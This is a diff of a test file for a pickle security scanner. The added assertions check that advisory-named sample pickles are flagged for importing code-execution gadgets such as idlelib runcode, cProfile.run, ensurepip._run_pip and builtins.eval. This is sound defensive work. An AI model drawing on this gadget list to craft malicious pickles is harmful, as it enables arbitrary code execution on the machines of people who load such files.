+    assert_scan("GHSA-8r4j-24qv-fmq9.pkl", [Global("idlelib.calltip", "Calltip.fetch_tip", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-9xph-j2h6-g47v.pkl", [Global("idlelib.calltip", "get_entity", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-4whj-rm5r-c2v8.pkl", [Global("torch.utils.bottleneck.__main__", "run_autograd_prof", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-xp4f-hrf8-rxw7.pkl", [Global("ensurepip", "_run_pip", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-p9w7-82w4-7q8m.pkl", [Global("lib2to3.pgen2.pgen", "ParserGenerator.make_label", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-m869-42cg-3xwr.pkl", [Global("idlelib.run", "Executive.runcode", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-j343-8v2j-ff7w.pkl", [Global("idlelib.pyshell", "ModifiedInterpreter.runcommand", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-3gf5-cxq9-w223.pkl", [Global("idlelib.pyshell", "ModifiedInterpreter.runcode", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-fqq6-7vqf-w3fg.pkl", [Global("doctest", "debug_script", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-9w88-8rmg-7g2p.pkl", [Global("cProfile", "runctx", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-49gj-c84q-6qm9.pkl", [Global("cProfile", "run", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-q77w-mwjj-7mqx.pkl", [Global("asyncio.unix_events", "_UnixSubprocessTransport._start", SafetyLevel.Dangerous)])
+    assert_scan("GHSA-jgw4-cr84-mqxg.bin", [Global("asyncio.unix_events", "_UnixSubprocessTransport._start", SafetyLevel.Dangerous)])
+    assert_scan("malicious1_crc.zip", [Global("builtins", name="eval", safety=SafetyLevel.Dangerous)])
+
 
 def test_scan_file_path_npz():
     compare_scan_results(
@@ -998,19 +1174,13 @@ def test_scan_url():
     malicious = ScanResult([Global(os.name, "system", SafetyLevel.Dangerous)], 1, 1, 1)
     compare_scan_results(scan_url("https://localhost/mock/pickle/malicious"), malicious)
 
-    malicious_zip = ScanResult(
-        [Global("builtins", "eval", SafetyLevel.Dangerous)], 1, 1, 1
-    )
-    compare_scan_results(
-        scan_url("https://localhost/mock/zip/malicious"), malicious_zip
-    )
+    malicious_zip = ScanResult([Global("builtins", "eval", SafetyLevel.Dangerous)], 1, 1, 1)
+    compare_scan_results(scan_url("https://localhost/mock/zip/malicious"), malicious_zip)
 
 
 def test_scan_huggingface_model():
     eval_sr = ScanResult([Global("builtins", "eval", SafetyLevel.Dangerous)], 1, 1, 1)
-    compare_scan_results(
-        scan_huggingface_model("ykilcher/totally-harmless-model"), eval_sr
-    )
+    compare_scan_results(scan_huggingface_model("ykilcher/totally-harmless-model"), eval_sr)
 
 
 def test_main():
@@ -1031,9 +1201,7 @@ def test_pickle_files():
 
 
 def test_invalid_bytes_err():
-    malicious_invalid_bytes = ScanResult(
-        [Global("os", "system", SafetyLevel.Dangerous)], 1, 1, 1, True
-    )
+    malicious_invalid_bytes = ScanResult([Global("os", "system", SafetyLevel.Dangerous)], 1, 1, 1, True)
     with open(f"{_root_path}/data/malicious-invalid-bytes.pkl", "rb") as file:
         compare_scan_results(
             scan_pickle_bytes(file, f"{_root_path}/data/malicious-invalid-bytes.pkl"),
